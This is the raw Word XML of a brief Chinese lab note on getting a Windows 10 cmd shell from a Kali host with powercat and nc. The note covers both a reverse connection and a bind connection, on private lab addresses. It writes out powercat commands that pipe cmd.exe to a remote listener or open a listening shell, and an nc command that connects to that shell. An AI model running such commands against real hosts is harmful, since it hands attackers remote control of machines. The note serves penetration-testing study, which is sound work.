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Kali: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  <w:t>192.168.96.129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Windows10: 192.168.96.130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正向连接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Windows10主机使用工具powercat，正向连接Kali主机上的nc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在Kali上开启nc监听</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1822450" cy="444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2、工具下载：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"https://github.com/besimorhino/powercat"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https://github.com/besimorhino/powercat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，然后powershell进入powercat.psl文件所在目录，执行 Import-Module .\powercat.ps1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PS C:\tools\powercat-master\powercat-master&gt; Import-Module .\powercat.ps1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3、执行命令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powercat -c 192.168.96.129 -p 1234 -e cmd.exe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666750"/>
            <wp:effectExtent l="0" t="0" r="19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Kali成功获取到Windows10主机的cmd shell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794250" cy="13398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反向连接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K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ali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主机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上的nc反向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连接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到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W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indows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10主机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上的</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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powercat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nc 192.168.96.130 8888 -vv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Chars="0" w:right="0" w:rightChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3416300" cy="1333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2、W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indows10主机上执行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powercat -l -p 8888 -e cmd.exe -v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Chars="0" w:right="0" w:rightChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1338580"/>
            <wp:effectExtent l="0" t="0" r="63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3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Chars="0" w:right="0" w:rightChars="0"/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Kali主机获取到windows10主机的cmd shell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Chars="0" w:right="0" w:rightChars="0"/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Chars="0" w:right="0" w:righ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32250" cy="13525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Chars="0" w:right="0" w:righ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"https://www.freebuf.com/column/135007.html"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https://www.freebuf.com/column/135007.html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在渗透测试中，最常见，或者最受欢迎的用法是反向 reverse shell和正向bind shell。反向shell是从目标主机发起到处于监听状态的攻击机器的shell连接方式，又叫被动连接，而正向bind shell是攻击主机通过特定的端口进行侦听目标主机即将到来的连接。在恶意软件中，bind shell又通常被称为后门。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B02A5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A9B02A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D97B79"/>
    <w:rsid w:val="00D40A0D"/>
    <w:rsid w:val="04D97B79"/>
    <w:rsid w:val="08854F49"/>
    <w:rsid w:val="10DE70B9"/>
    <w:rsid w:val="10F37C66"/>
    <w:rsid w:val="1E4923ED"/>
    <w:rsid w:val="1F7563E7"/>
    <w:rsid w:val="209D3F8F"/>
    <w:rsid w:val="23BB0F59"/>
    <w:rsid w:val="26542E30"/>
    <w:rsid w:val="2D356A0D"/>
    <w:rsid w:val="2EC33EB6"/>
    <w:rsid w:val="33A174D9"/>
    <w:rsid w:val="34103C69"/>
    <w:rsid w:val="3A145A31"/>
    <w:rsid w:val="3E832C76"/>
    <w:rsid w:val="40173EDE"/>
    <w:rsid w:val="425A267B"/>
    <w:rsid w:val="43277135"/>
    <w:rsid w:val="44D55CD6"/>
    <w:rsid w:val="48E12BCD"/>
    <w:rsid w:val="4DFC33D6"/>
    <w:rsid w:val="4EBD3522"/>
    <w:rsid w:val="5A3C51E8"/>
    <w:rsid w:val="5F5C310E"/>
    <w:rsid w:val="6A457BB3"/>
    <w:rsid w:val="6D5F201D"/>
    <w:rsid w:val="6E511BD0"/>
    <w:rsid w:val="740367D2"/>
    <w:rsid w:val="7DCB7922"/>
    <w:rsid w:val="7EA6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bCs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14"/>
      <w:ind w:left="575" w:hanging="575"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-US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ind w:left="720" w:hanging="720"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:sz w:val="30"/>
      <w:szCs w:val="21"/>
      <w:lang w:eastAsia="en-U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Hyperlink"/>
    <w:basedOn w:val="12"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="标题 1 字符"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36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2020-11-03T06:56:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-03T08:48:33Z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